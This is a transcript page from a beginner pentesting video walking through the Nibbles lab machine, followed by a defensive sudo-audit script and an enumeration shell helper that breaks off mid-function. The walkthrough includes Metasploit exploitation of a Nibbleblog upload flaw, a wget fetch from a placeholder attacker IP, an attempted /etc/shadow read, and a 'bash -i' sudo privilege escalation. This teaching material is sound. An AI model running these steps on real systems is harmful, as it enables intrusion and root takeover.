Pentesting for n00bs: Episode 6 - Nibbles

The Cyber Mentor · Beginner · 🔐 Cybersecurity · 6y ago

Key Takeaways

The video covers pentesting for beginners using the Nibbles machine, focusing on web enumeration and Linux privilege escalation, and demonstrates tools such as nmap, searchsploit, and Metasploit.

Full Transcript

What is up everybody, welcome to episode 6 of Pentesting for n00bs. On today's episode we are going to be working on a box called Nibbles. Now Nibbles is a Linux-based machine and it's gonna teach us a little bit about web enumeration and, more importantly, it's gonna teach us some of the basics of Linux privilege escalation, especially with the sudo -l command, and we'll get into that a little bit further as we get into the machine. So as always, if you like this video please do hit that like button, the subscribe button, and hit that bell as well, and of course leave a comment if you liked the video; if you found room for improvement, also leave a comment on that. So Nibbles lives at 10.10.10.75. Go ahead and get your nmap scan started on that, boot up your machine, do everything you need to do as we've done in the past episodes, and I will meet you over in the video.

All right, now on our Kali machine, taking a look at our nmap scan, we see that there are two ports that have returned: one is port 22, which is SSH, and the other is port 80, which is HTTP. Now in this scenario it's actually quite common, and we've talked about it in previous videos, where you see something like port 22 and port 80 and that's it. In this vector, especially on easy machines like this for capture-the-flag, typically port 80 is the way in and port 22 would be utilized in some way later on: you might get a reverse shell on port 80, you might find credentials on port 80, something here might lead us to a nice shell later on. Typically the version of SSH is not the way in; there's not usually RCEs, or remote code execution, on versions. So we could definitely search on this OpenSSH and see if there's anything out there; my guess would be there isn't. On top of that, we see that there is Ubuntu running on the machine, so this would be useful information for us just during the information gathering process. So we'll store this in our back pocket and know that it's running Ubuntu on the back end, so we already know we're up against a Linux machine. On top of that, we can kind of tell we're against a Linux machine with the SSH and the Apache here, so again Ubuntu showing here on this HTTP service.

So a couple things that we can do is we can look for exploits against Apache as well. So for example, a tool that I haven't shown you but wanted to show you is a tool called searchsploit. So we could say hey, we've got Apache open and maybe we want to just quickly know: is there any kind of exploit for this 2.4.18? Well, we come down here and we can start typing in searchsploit and just go ahead and tab and autocomplete. Now the thing I will say about searchsploit is that you don't have to be very specific; if you're very specific with your query it's actually worse off for you, and I'll show you an example. So if you say hey, I'm up against Apache 2.4.18, it's gonna say I didn't find anything. But if we back that out a little bit and we say hey, we're against Apache 2.4, okay, now some stuff starts showing up. When we get very version specific like this we might actually miss some details in terms of exploits; as you can see here there's an exploit right here from 2.4.17 to 2.4.38, and this 2.4.18 actually falls in line in here. So it's important to note that: let's not be too specific if we use the searchsploit tool. Now what searchsploit is doing is it's pulling down from Exploit Database, which is actually already pulled down and updated on your machine, since the owners of Kali Linux also run Exploit Database. They have a nice little repository of all the exploits that are on Exploit Database on your machine, so we're just doing an offline search here; we don't even have to touch the web to do this search, and any exploit that has been pulled down is available on your machine. You can see we have a shell script here, PHP; if we see a .rb for Ruby, that means it's a Metasploit module most of the time.

So we could see those things as well, and for example on the exploit we can tell some other things as well: it's an exploit for Linux, that's good, that checks a box, but it's a local exploit, meaning we have to be on the machine or already have some sort of access to it, right, to exploit this. So this isn't gonna work for us; we're more after a remote exploit of some sort, and we're really not after any kind of denial of service exploits typically. Especially in a real pentest those are out of scope, but when we're talking about having a capture the flag like we're doing here, these are really out of scope, right? We don't want to deny service to our box; there's no point in doing that. Now say this was a 2.4.17 and we know it's vulnerable to denial of service; on a report we would actually write this up, we'd absolutely write it up. We would note hey, you know, this version is vulnerable to X, Y and Z including denial of service; see these write-ups here as to what can happen if it was running on Windows.

So let's go ahead and do a little bit of further enumeration. I don't think Apache 2.4.18 is actually the way in here, so if we go out to the interwebs and we just say 10.10.10.75, we get a "Hello world". Okay, so not a lot to go on here. There's a few things that I always do when I first get to a web page, and I'm gonna note that this box does teach valuable lessons. Again, we're starting to get off of the really, really easy machines, and this is still gonna be easy, but this is going to feel more capture-the-flag like than anything else that we've done so far, and that's okay. We're starting to get into some of these Hack The Box machines that are gonna feel capture-the-flag, and our take on this is going to be from a realistic perspective as much as we can do, but there are going to be some methods along the way that we're going to encounter that are gonna be capture the flag like. On top of that, there's gonna be homework that I'm gonna give you, a good machine here towards the end. I've skipped a couple machines that are really easy and kind of repetitive to what we've done, so I'm going to give that as homework to allow us to test our knowledge and see where we need to fill in gaps, and then we'll do a quick review video for that here in the future, but I'll give that out towards the end of the video.

So back into this session here. A few things that we can do from this point: we can go ahead and start up a nikto scan and do some vulnerability scanning against this webpage; we can take the directory here and do some directory busting, because if we just see this and this is all we have, we don't have any links or anything, maybe there's something running on the back end of this server here and we'll have to use directory busting to find that. On top of that, we can do some enumeration here if you have a tool called Wappalyzer. Now Wappalyzer is a great tool; you can see here that we've pulled down Apache and Ubuntu. If you don't have Wappalyzer installed, I do recommend just googling Wappalyzer here and installing this plugin for your Firefox. So from here, let's go ahead and just right-click and view the source. I've said this to you guys before, but again, especially in capture the flags they like to hide little comments in the source code. This is a realistic perspective in the sense that we should be looking for comments in source code by developers; we should be looking for hard-coded credentials and anything of value that might be in source code, so it's always important to look at the source code. As you can see here, there is a comment pointing to a nibbleblog directory, so we're just gonna copy this and come over here. I'm just gonna type it out, but go into nibbleblog, not the admin page, just like this, and you'll see that we are given this nice little blog here. You can see "Nibbles, yum yum" and we've got that Hello World and not a whole lot of anything else. You've got some categories we can click around and enumerate, see if there's anything here that we can do, and for the most part we are pretty stuck.

We can view the source code and see if there's any information on this nibbleblog here, okay, if we can see any kind of version or what it's running on, what platform. I'm not seeing anything right off the bat. We can come back and also look at Wappalyzer and see if there's anything of interest here. Okay, it's running on jQuery, it's running on PHP; that might help us if we get some sort of exploit going for this. So in terms of what we see, there's nothing readily available, I don't have anything to exploit, so the next thing that we would do here is we would do a quick search on this. We can just say searchsploit (I could type in the panel here, searchsploit) and we'll just say something like "nibbles". Okay, that didn't work; how about "nibble"? See, I got too specific there. Okay, so it is actually called Nibbleblog, and we can see that there's a couple exploits out for it: one is a version 3 and it's got SQL injections on the web app, and then we've got a 4.0.3 that's very specific on an arbitrary file upload that allows remote code execution, and it's a .rb, which means this is a Metasploit module available. So what's the difference between these two? Well, a SQL injection can lead to a shell, it can lead to database dumps, it can lead to a lot of malicious stuff, but not always; you could get SQL injection and not find anything of interest on the attack side. This thing here, this arbitrary file upload with remote code execution, is way more juicy. Remote code execution means that we could be sitting at our house, exploit this, and get code execution to talk back to us without ever having to be local. Okay, so in terms of the nastier exploit, it's this all the way. Now we don't know what either of these do, but the one I would be eager to look at is this 4.0.3. So in order to do that I'm just gonna boot up Metasploit really quick and we can actually load up that module and see a little bit more information.

We could also go out to the web and do this, to look at the file, and we could actually probably read the Ruby file and pull the information down, but just in a clear-cut way let's just search nibble real quick, and then we'll just copy this guy here and say use, paste, and then all we have to do is type info. So from info we can see the description here; it says Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This was tested in 4.0.3. We've got a blog about it here, we've got the CVE details, very interesting stuff, but if it says authenticated that means we need to authenticate; that means there's probably some sort of login page somewhere. So what can we do here? Well, we don't see an admin panel or login page or anything. We could just type in admin and get lucky, which is what I did right off the bat: I just typed in admin.php and found it. Now there are other methods to doing this as well. We could go into a new tab here and we could run something like DirBuster, and in DirBuster we could copy this address here like this and just paste it and then add in the 80 at the end right here like this. Now my typical settings would be to say to go faster on this, and we can browse to our file and do something like base here, and then we're gonna go to usr, go to share, and just start typing wordlists, so type in wo and you'll see wordlists comes up second in here. There's a dirbuster folder; I believe I've actually shown you guys this before but it doesn't hurt to show it again, and I always choose the medium list because I like to be as robust as possible. We can start with the nibbleblog directory, so we just say nibbleblog here. I keep calling it nibbles because that's the name of the machine, but it's definitely nibbleblog. And then we know it's a PHP extension; we can totally look for just PHP. If we wanted to look for more we could say like txt, bak files, zip files, rar files, PDF, any kind of extension you want here. Just for the sake of purpose and time's sake we're just gonna search for PHP and we'll go ahead and start that on the nibbleblog itself.

Now it's already finding a ton of info. We go to the tree view (I like the tree view); you can see there's index, admin, install, update, sitemap, okay, so there's a lot of stuff here for this in particular. Now we found the admin area by just guessing the admin area, and if we did some research on the blog we probably could have found where the admin page was as well; we could say hey, where's the Nibbleblog admin at, right? So we see some interesting information; you can see it's pulling down a ton of files through here as well, so I'm gonna go ahead and actually just stop this, we don't need to run this whole thing. So here's some things you can do. We're at the Nibbleblog admin area now. This won't have default credentials, right; this is somebody's personal blog. And in order to save time we're just gonna talk through this process. What we could do is build out a brute force similar to the last episode, where we captured or intercepted here and we attempted to... we could use Burp Suite and Intruder, right, and try to do a username and password, something along the lines of admin or administrator, and then use a common bad password list here and see if we can get in. We could also go to the Nibbleblog page itself. If we just go back (let me delete this) and we'll just go to nibbleblog, and we could come here, and if there were actual blog information we could use a tool like CeWL and try to pull down information. We could pull down words off of this list and we can say hey, what words do they use in their blog that maybe we can perhaps relate to them and use as a password. We don't need to do that here, there's not a lot, but if we look at some words on here, the password actually ends up being right here with "nibbles". So nibbles is going to be our password. There's actually a timeout, I believe, if we enter in too many incorrect users and passwords, so we're not gonna do that, and if you're interested in brute forcing with Burp Suite, episode five I believe was the episode where we took brute-forcing and we used Burp Suite to do that.

So let's just go ahead and type in admin and then, lowercase, just type in nibbles, and you'll see that we get access to the page. So we have access. We need to determine if this is actually 4.0.3, because that's important, right; we need to know if this is the right version for us. So we can go into settings here. If you just click around, what you should be doing as well is enumerate this whole application. If you log into an application you should be looking at what you can do: can you upload, can you be malicious, you can manage pages or settings, there's themes, there's all kinds of stuff in here, right. But if we come to the settings page here, on the first settings tab, and we scroll all the way down, you could see that we are running Nibbleblog 4.0.3. This is money, this is confirmed, right; we have what we need, we've got user credentials, we can effectively do this. So let's do this. Let's go back to our Metasploit that we had, and I'm going to close out this DirBuster here. Okay, so if we look at our options (show options, with our info as well), we need a password, required; we need a target URI, okay; and we need a username. So, oh, we also need our RHOST, so we're gonna have to supply a few things here. Let's go ahead and set the password to nibbles, we'll set the username to admin, we'll set the RHOST (is it RHOST or RHOSTS?) to 10.10.10.75, and I believe we're gonna need to set the target URI to admin.php. I could be incorrect here, but we'll see. Okay, now let's show options again real quick. We only have one target, this looks okay, everything looks like we set it correctly, so let's go ahead and type run and see if that works. Okay, so that didn't work, because I am dumb: if you notice, we're actually at nibbleblog/admin, so let's set the target URI to... let's just try nibbleblog first, and then I think it actually knows where the admin directory is, so let's just do /nibbleblog and then we'll run this.

There we go, and now we've got a session. So you can see what it's doing is it's uploading a malicious image.php, and if you want to see where that's happening we can come into our settings here and go into plugins, and under plugins there's a My image; if you actually go to configure here, you can see that we have the ability to upload an image. Now this image we're uploading is a .php; that should not be happening, right, we should have some sort of blacklisting going on, or whitelisting on extensions that we want to run, but if we try to upload a PHP file we're allowed to do so. Since we're allowed to do that we can then call that PHP file, execute it, and get a reverse shell on this system. So easy, easy breezy here. So now we've got a shell. We can do sysinfo and look at some information here. So this is good information off the bat: we can see that we've got a 4.4.0-104-generic Ubuntu. We always want to look for this for privilege escalation purposes. So if we're not the high level user, let's get our UID real quick. We're not a high level user; we're 1001 here, so you can see nibbler, we are not root. So we're going to need to do some privesc. One very, very nice thing to do is to just search the Ubuntu on this and look for privesc; that's one of the first steps we would do. But let me go ahead and get into the machine. We'll type shell, and let's look at the present working directory, or print working directory, okay. Let's go into the home folder and whoami: we are nibbler. Let's cd into nibbler and then let's just ls real quick, so let's ls -la, see what's going on here. Okay, so a couple things: we can grab the user text file here; we also have the ability to... I'm going to type out, or sorry, cat the user.txt. We have the ability here to look at a few things.

Something that I always like to look at right off the bat is history. Okay, the history command's not found. Now the history command would show us all the history that the user had typed previously. Now in this instance we don't have it, command's not found, that's fine, but for historical purposes you never know if a user's typing in a password or some sort of credentials there. I can't talk today, apparently. Another place to look is, you see that .bash_history; we could just cat .bash_history and see if there's anything there, and unfortunately there's not. So what can we do here? Well, another thing that I like to do before I go searching and hunting for a privesc is I like to do a sudo -l, and this might take a second on this machine; this machine is having a little bit of timeout issues. It could be with our shell that we have here since we don't have TTY interaction, but that's okay, just give it a second, and once that happens we'll take a look. So sudo -l is for no passwords. So if you don't know what sudo is, sudo is running as an admin, or running a command at the privileges of root or admin, and it requires a password to do that. So if you're not familiar with sudo, maybe go back and learn some more Linux and just get a little bit more familiar with the basics of Linux. But here we're able to run a command without a password. So if we wanted to do something, for example, let's say cat /etc/shadow, we wanted to get the shadow file: permission denied. Now we might be a member of the sudo group, right, and we could say sudo /etc/shadow, or the sudoers, but we need to enter a password here, and we don't know the password; we didn't get in with a password. So unless we stumble across the password or we figure out the password, then we're kind of stuck. But we have the ability to run something without a password here, and it's this monitor.sh in our personal/stuff folder. So we can ls -la again, and you can see there is no personal or stuff folder, so there's gonna be no monitor.sh as well.

What that means is we have the ability to create a shell script here in these folders and get malicious. But a couple of things before we actually root this machine. So this one's pretty straightforward on what it can do, and I think the next video we're gonna do is going to be somewhere around the sudo -l again, so you can just see how these things sort of work and how we might have to do a little bit of investigative measures. So what we've got here is we've got some enumeration we could do. There's this personal.zip, and if in the back of your mind you're saying "what's that personal.zip?", perfect thought process, right; we should download this in a perfect world, enumerate it, see what's in there, see if there's any password protections, try to crack those, etc. But just for the sake of time in this video, so it doesn't run too long, we're not gonna go down that rabbit hole. I'm gonna show you the ways, and now there are some good scripts out there. Say it wasn't this obvious to us, or there wasn't a sudo -l shell, and there's no history, and we search on the uname: we could type uname, uname -a, we search on the uname here and we look for this Ubuntu, and Google and say hey, privilege escalation on 4.4.0-104-generic, and nothing comes up. Okay, that's another step that we could take, see if there's any exploits for this; no, nothing comes up. Well, there are some great scripts out there and I'm gonna leave you to do your own research on this, but there is a script called LinEnum.sh; there is also a linuxprivchecker.py. Both of these are absolutely gold when it comes to enumerating Linux. Most Ubuntu Linux machines come with Python installed, and almost always they can run shell, right, so they can run these bash scripts. So with that being said, maybe a challenge to you in this video is to go find these, download them, and then transfer the files onto these machines. How do we transfer the file? So we'll do an example real quick and then I'll let you figure out how to run and execute them.

So we need to create a malicious file that will allow us to run as root. Here we have /home/nibbler; we need to create a new folder called personal, and we need to cd into that, make a new folder called stuff, cd into stuff, and if we print the working directory, okay, we're there. So now we need to make a malicious file, right; we've got a monitor.sh. We could do a touch monitor.sh, or we can actually just echo a command into there if we want. We could echo "bash -i" and we can just say put that into monitor.sh, something like this, ls, and then you cat that monitor.sh and see that it just says bash -i, and I'll explain this here in a second. Now I did say I was gonna do a file transfer. We could do the exact same thing with wget; say we're over here and we made that file. I'm just gonna show you again: say I'll make it over here, echo "bash -i" into monitor.sh, and okay, we should be able to cat monitor.sh and it should be fine. Now we can just start up python -m SimpleHTTPServer on port 80, and I'm not gonna actually grab this file, but you guys should have seen this before, right; we'll just do a wget here, or a curl if we need to: wget http://<whatever your IP address is here>/monitor.sh, and that would get that file as well. So we could just use the echo command here and make it straightforward. So how do we exploit this now, and what are we doing? Why did I just do this bash -i? Well, bash -i just means bash interactive. What we're about to do with the sudo command is we can run this file as sudo and make it execute, right, and when we execute it, it's going to echo out, or it's gonna run the script, which says bash -i; it's gonna give me an interactive bash shell. That interactive bash shell is going to be run as root because we're executing it with sudo as root. Now one thing that we should do here is we should make this file executable. If we ls -la you can see the permissions here say that we are not executable; we only have read/write access right now, so let's change this to executable as well, and you should always do this on your shell scripts.

And we'll say ls -la one more time and you can see now the x's have been added. Okay, so with this let's go ahead and sudo this script here. Let's just say sudo monitor.sh, run that; it might take a second. We could say whoami, let's see if this actually works. So again we're timed out here; you could see that it timed out earlier on a command as well, so this machine has a little bit of timeout issues, so just give it a quick second here to load. And there you go, and again it says we're nibbler. Let's try it one more time and say whoami, and we are still nibbler. What's our ID? We are still nibbler. Why are we still nibbler? Let's take a look again. So if we cat monitor.sh: bash -i. All right, let's try running this as sudo /home/nibbler/personal/stuff/monitor.sh, and then we'll do id at the end of this. Let's give this a go, see if this works. And again, if you want these scripts, all you've got to do is go out there and Google these; these are great, you should find these pretty easily. Let's go to Google... and I see we got our shell back. LinEnum.sh download, you see that, so rebootuser on this one, and then linuxprivchecker. There's actually a Linux privilege escalation... oh, here you go, Linux privilege escalation scripts down here, netsec, pretty good as well: LinEnum, linuxprivchecker. This g0tmi1k blog is actually really good too, so if you check out the g0tmi1k blog you can see all the different commands that we're not gonna cover today, but he did a great job putting this blog together on what you should be looking for, and then people went out and automated tools that will help do that same stuff for you, all that searching for you, all the hard work. So we had to run this, and we tried to sudo this monitor; we had to run the full directory with monitor in there and that will actually allow us to resolve to the UID of root.

So doing this sudo here does not work; doing it this way will work. So now you can see we are root. We can go ahead and take advantage of that by going to the root folder, pwd, okay, so we are root at Nibbles, right, so easy, easy. We can ls and there's the root.txt. I keep wanting to do type; I've been working in Windows so much lately. Okay, same thing, cat root.txt, and you can get your root flag as well and go submit those. So that is it for this lesson. From here there is a box that I want you guys to do; that box is called Optimum. Look for the box Optimum and go ahead and give that a go. In the next video we'll cover that as a precursor and then we'll go into another lesson, but give Optimum a go and see if you can do it on your own, give yourself a little confidence and see if you can do that on your own, and we'll go from there. So again, thank you, thank you for watching this video. Please do hit that like, subscribe and the bell, leave a comment down below. If you are watching this video and you want to watch it sooner, or you like the work that I do, please do consider donating to Patreon; Patreon members get early access, you get some cool stickers, some cool swag, you get to see the videos early as well, and some cool little features on Discord, so please do consider supporting the channel in that way. Other than that, thank you so much for joining me, and until next time, my name is The Cyber Mentor and I will catch you later.
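
As an added example (not code from the video), here is the defender-side check for the privilege escalation the episode walks through: it parses `sudo -l` output and flags NOPASSWD rules whose target is missing, lives in the user's home, or sits in a directory the user can write, which is exactly why nibbler could create personal/stuff/monitor.sh and run it as root. The sample output is constructed around the path quoted in the transcript; the `can_write` hook and the `Finding` structure are my own assumptions so the audit can also run off-box against saved output.

```python
"""Audit `sudo -l` output for NOPASSWD rules the user could hijack.

Added example for this transcript, not the video's own code. Flags rules whose
target command is missing, lives in the user's home, or is writable (directly or
through its directory), i.e. the /home/nibbler/personal/stuff/monitor.sh pattern.
"""
import os
import re
from dataclasses import dataclass, field
from pathlib import Path
from typing import Callable, List

# A user-specification line as `sudo -l` prints it, e.g.
#     (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
# Tags such as NOPASSWD: or SETENV: are optional and may stack.
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$"
)

# Constructed sample modelled on the nibbler user's `sudo -l` from the video.
SAMPLE_SUDO_L = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""


@dataclass
class Finding:
    runas: str
    command: str
    nopasswd: bool
    reasons: List[str] = field(default_factory=list)

    @property
    def risky(self) -> bool:
        return bool(self.reasons)


def nearest_existing(path: Path) -> Path:
    """Walk up from a missing path to the closest ancestor that exists:
    that is the directory an attacker would have to create the file in."""
    while not path.exists() and path != path.parent:
        path = path.parent
    return path


def default_can_write(path: Path) -> bool:
    # Assumption: the audit runs as the user being audited (os.access answers
    # for the current process); pass a custom predicate otherwise.
    return os.access(path, os.W_OK)


def audit_sudo_l(text: str, home: str,
                 can_write: Callable[[Path], bool] = default_can_write) -> List[Finding]:
    """Parse `sudo -l` output and return one Finding per listed command."""
    home_path = Path(home).resolve()
    findings: List[Finding] = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines, headers, blank lines
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            f = Finding(m.group("runas"), cmd, nopasswd)
            findings.append(f)
            if cmd == "ALL":
                f.reasons.append("unrestricted command (ALL)")
                continue
            binary = Path(cmd.split()[0])  # ignore fixed arguments
            if not binary.is_absolute():
                f.reasons.append("relative path: resolved via the caller's PATH")
                continue
            target = binary.resolve()
            if target == home_path or home_path in target.parents:
                f.reasons.append("target lives in the user's home directory")
            if not target.exists():
                f.reasons.append("target does not exist")
                anchor = nearest_existing(target)
                if can_write(anchor):
                    f.reasons.append(f"user can create it under {anchor}")
            else:
                if can_write(target):
                    f.reasons.append("target file is writable by the user")
                if can_write(target.parent):
                    f.reasons.append("target directory is writable: file can be replaced")
    return findings


def report(findings: List[Finding]) -> str:
    """Render findings one per line, reasons indented beneath each rule."""
    out = []
    for f in findings:
        tag = "NOPASSWD" if f.nopasswd else "password"
        out.append(f"[{'RISK' if f.risky else 'ok'}] ({f.runas}) {tag}: {f.command}")
        out.extend(f"        - {r}" for r in f.reasons)
    return "\n".join(out)


if __name__ == "__main__":
    # Off the Nibbles box the sample path is simply absent, but the rule still
    # gets flagged because it points into ~nibbler.
    print(report(audit_sudo_l(SAMPLE_SUDO_L, "/home/nibbler")))
```

Run it on a saved `sudo -l` transcript with the audited user's home and a predicate that knows that user's write permissions; every RISK line is a rule where the "command" is really whatever the user decides to put there.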

Original Description

Get my:
25 hour Practical Ethical Hacking Course: https://www.udemy.com/course/practical-ethical-hacking/?referralCode=4A7D5EE973AFBCAD11C6
Windows Privilege Escalation for Beginners Course: https://www.udemy.com/course/windows-privilege-escalation-for-beginners/?referralCode=7CADEAA4AA3D5A1032AE

0:00 - Introduction
1:02 - Reviewing the nmap scan
2:52 - Using searchsploit to find exploits
5:35 - Enumerating and exploiting port 80
19:13 - Looking into Linux privilege escalation

❓Info❓
Need a Pentest?: https://tcm-sec.com
Learn to Hack: https://academy.tcm-sec.com

🔹The Cyber Mentor Merch🔹
https://teespring.com/stores/the-cyber-mentor

📱Social Media📱
Website: https://thecybermentor.com
Twitter: https://twitter.com/thecybermentor
Twitch: https://www.twitch.tv/thecybermentor
Discord: https://tcm-sec.com/discord
LinkedIn: https://www.linkedin.com/in/heathadams

💸Donate💸
Like the channel? Please consider supporting me on Patreon: https://www.patreon.com/thecybermentor
Support the stream (one-time): https://streamlabs.com/thecybermentor

Hacker Books:
Penetration Testing: A Hands-On Introduction to Hacking: https://amzn.to/31GN7iX
The Hacker Playbook 3: https://amzn.to/34XkIY2
Hacking: The Art of Exploitation: https://amzn.to/2VchDyL
The Web Application Hacker's Handbook: https://amzn.to/30Fj21S
Real-World Bug Hunting: A Field Guide to Web Hacking: https://amzn.to/2V9srOe
Social Engineering: The Science of Human Hacking: https://amzn.to/31HAmVx
Linux Basics for Hackers: https://amzn.to/34WvcXP
Python Crash Course, 2nd Edition: https://amzn.to/30gINu0
Violent Python: https://amzn.to/2QoGoJn
Black Hat Python: https://amzn.to/2V9GpQk

My Build:
lg 32gk850g-b 32" Gaming Monitor: https://amzn.to/30C0qzV
darkFlash Phantom Black ATX Mid-Tower Case: https://amzn.to/30d1UW1
EVGA 2080TI: https://amzn.
The Cyber Mentor
29 Zero to Hero Pentesting: Episode 2 - Python 101
Zero to Hero Pentesting: Episode 2 - Python 101
The Cyber Mentor
30 Zero to Hero Pentesting: Episode 3 - Python 102, Building a Terrible Port Scanner, and a Giveaway
Zero to Hero Pentesting: Episode 3 - Python 102, Building a Terrible Port Scanner, and a Giveaway
The Cyber Mentor
31 Zero to Hero Pentesting: Episode 4 - Five Phases of Hacking + Passive OSINT
Zero to Hero Pentesting: Episode 4 - Five Phases of Hacking + Passive OSINT
The Cyber Mentor
32 Zero to Hero Pentesting: Episode 5 - Scanning Tools (Nmap, Nessus, BurpSuite, etc.) & Tactics
Zero to Hero Pentesting: Episode 5 - Scanning Tools (Nmap, Nessus, BurpSuite, etc.) & Tactics
The Cyber Mentor
33 Zero to Hero Pentesting: Episode 6 - Enumeration (Kioptrix & Hack The Box)
Zero to Hero Pentesting: Episode 6 - Enumeration (Kioptrix & Hack The Box)
The Cyber Mentor
34 Zero to Hero Pentesting: Episode 7 - Exploitation, Shells, and Some Credential Stuffing
Zero to Hero Pentesting: Episode 7 - Exploitation, Shells, and Some Credential Stuffing
The Cyber Mentor
35 Installing Windows Server 2016 on VMWare in 5 Minutes
Installing Windows Server 2016 on VMWare in 5 Minutes
The Cyber Mentor
36 Zero to Hero: Week 8 - Building an AD Lab, LLMNR Poisoning, and NTLMv2 Cracking with Hashcat
Zero to Hero: Week 8 - Building an AD Lab, LLMNR Poisoning, and NTLMv2 Cracking with Hashcat
The Cyber Mentor
37 A Day in the Life of an Ethical Hacker / Penetration Tester
A Day in the Life of an Ethical Hacker / Penetration Tester
The Cyber Mentor
38 Active Directory Exploitation - LLMNR/NBT-NS Poisoning
Active Directory Exploitation - LLMNR/NBT-NS Poisoning
The Cyber Mentor
39 Zero to Hero: Week 9 - NTLM Relay, Token Impersonation, Pass the Hash, PsExec, and more
Zero to Hero: Week 9 - NTLM Relay, Token Impersonation, Pass the Hash, PsExec, and more
The Cyber Mentor
40 Zero to Hero: Episode 10 - MS17-010/EternalBlue, GPP/cPasswords, and Kerberoasting
Zero to Hero: Episode 10 - MS17-010/EternalBlue, GPP/cPasswords, and Kerberoasting
The Cyber Mentor
41 Writing a Pentest Report
Writing a Pentest Report
The Cyber Mentor
42 Zero to Hero: Week 11 - File Transfers, Pivoting, and Reporting Writing
Zero to Hero: Week 11 - File Transfers, Pivoting, and Reporting Writing
The Cyber Mentor
43 The Complete Linux for Ethical Hackers Course for 2019
The Complete Linux for Ethical Hackers Course for 2019
The Cyber Mentor
44 Full Ethical Hacking Course - Beginner Network Penetration Testing (2019)
Full Ethical Hacking Course - Beginner Network Penetration Testing (2019)
The Cyber Mentor
45 Popping a Shell with SMB Relay and Empire
Popping a Shell with SMB Relay and Empire
The Cyber Mentor
46 Pentesting for n00bs: Episode 1 - Legacy (hackthebox)
Pentesting for n00bs: Episode 1 - Legacy (hackthebox)
The Cyber Mentor
47 Pentesting for n00bs: Episode 2 - Lame
Pentesting for n00bs: Episode 2 - Lame
The Cyber Mentor
48 Pentesting for n00bs: Episode 3 - Blue
Pentesting for n00bs: Episode 3 - Blue
The Cyber Mentor
49 Web App Testing: Episode 1 - Enumeration
Web App Testing: Episode 1 - Enumeration
The Cyber Mentor
50 Pentesting for n00bs: Episode 4 - Devel
Pentesting for n00bs: Episode 4 - Devel
The Cyber Mentor
51 Pentesting for n00bs: Episode 5 - Jerry
Pentesting for n00bs: Episode 5 - Jerry
The Cyber Mentor
52 Web App Testing: Episode 2 - Enumeration, XSS, and UI Bypassing
Web App Testing: Episode 2 - Enumeration, XSS, and UI Bypassing
The Cyber Mentor
Pentesting for n00bs: Episode 6 - Nibbles
Pentesting for n00bs: Episode 6 - Nibbles
The Cyber Mentor
54 Web App Testing: Episode 3 - XSS, SQL Injection, and Broken Access Control
Web App Testing: Episode 3 - XSS, SQL Injection, and Broken Access Control
The Cyber Mentor
55 How NOT to Approach a Cybersecurity Mentor
How NOT to Approach a Cybersecurity Mentor
The Cyber Mentor
56 Web App Testing: Episode 4 - XXE, Input Validation, Broken Access Control, and More XSS
Web App Testing: Episode 4 - XXE, Input Validation, Broken Access Control, and More XSS
The Cyber Mentor
57 Pentesting for n00bs: Episode 7 - Optimum (hackthebox)
Pentesting for n00bs: Episode 7 - Optimum (hackthebox)
The Cyber Mentor
58 Pentesting for n00bs: Episode 8 - Bashed (hackthebox)
Pentesting for n00bs: Episode 8 - Bashed (hackthebox)
The Cyber Mentor
59 Pentesting for n00bs: Episode 9 - Grandpa
Pentesting for n00bs: Episode 9 - Grandpa
The Cyber Mentor
60 Top 5 Internal Pentesting Methods
Top 5 Internal Pentesting Methods
The Cyber Mentor

This video walks beginners through the Nibbles machine (10.10.10.75), a Linux box that teaches web enumeration and the basics of Linux privilege escalation. It demonstrates nmap for port scanning, searchsploit for matching service versions to public exploits, and Metasploit for exploitation. By following along, viewers learn how to enumerate a web server, exploit what they find to get a shell, and escalate to root.

Key Takeaways
  1. Run an nmap scan to identify open ports and service versions (here only 22/SSH and 80/HTTP on an Ubuntu host)
  2. Use searchsploit to look for public exploits matching the identified HTTP service version
  3. Use Metasploit to exploit the identified vulnerability
  4. Directory-bust the web server to find hidden directories and files (directory busting enumerates paths, not running services)
  5. Use Wappalyzer to fingerprint the technologies behind the web page
  6. Once on the box, run sudo -l to list the commands the current user may run as root; that is the Linux privilege escalation technique this episode focuses on
💡 Easy CTF machines that expose only SSH and HTTP are usually entered through the web service, with SSH becoming useful later for credentials or a stable shell; the video shows that workflow end to end, from web enumeration to root via sudo.
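The takeaways above describe an enumeration workflow (scan, match versions against searchsploit, directory-bust the HTTP service). The script below is an added example, not code from the video, that automates the triage step: it parses an nmap grepable-output (-oG) line and prints the follow-up commands for each open service. The scan line is constructed to resemble the 22/SSH + 80/HTTP result for 10.10.10.75 and its version banners are placeholders, not a claim about the real box; gobuster and the wordlist path are assumptions, so substitute whatever directory-busting tool you use.

```shell
#!/bin/sh
# Added example (not from the video): turn an nmap -oG line into the next
# enumeration commands. The GNMAP text is CONSTRUCTED sample output; the
# version strings are placeholders, not the real box's banners.

TARGET=10.10.10.75
WORDLIST=/usr/share/wordlists/dirb/common.txt   # assumed path; adjust for your Kali

GNMAP=$(printf 'Host: %s ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/\tIgnored State: closed (998)\n' "$TARGET")

# open_services: one line per open port, "PORT PROTO SERVICE VERSION...".
# -oG fields are port/state/proto/owner/service/rpcinfo/version/ separated by
# "/"; this assumes the version field itself contains no "/".
open_services() {
    printf '%s\n' "$GNMAP" | awk -F'\t' '
        {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^Ports: /) ports = substr($i, 8)
            n = split(ports, p, /, /)
            for (i = 1; i <= n; i++) {
                split(p[i], f, "/")
                if (f[2] == "open") print f[1], f[3], f[5], f[7]
            }
        }'
}

# product_version: shorten a banner to "product version" for searchsploit,
# i.e. everything up to and including the first token containing a digit
# ("Apache httpd 2.4.18 ((Ubuntu))" -> "Apache httpd 2.4.18").
product_version() {
    printf '%s\n' "$*" | awk '{
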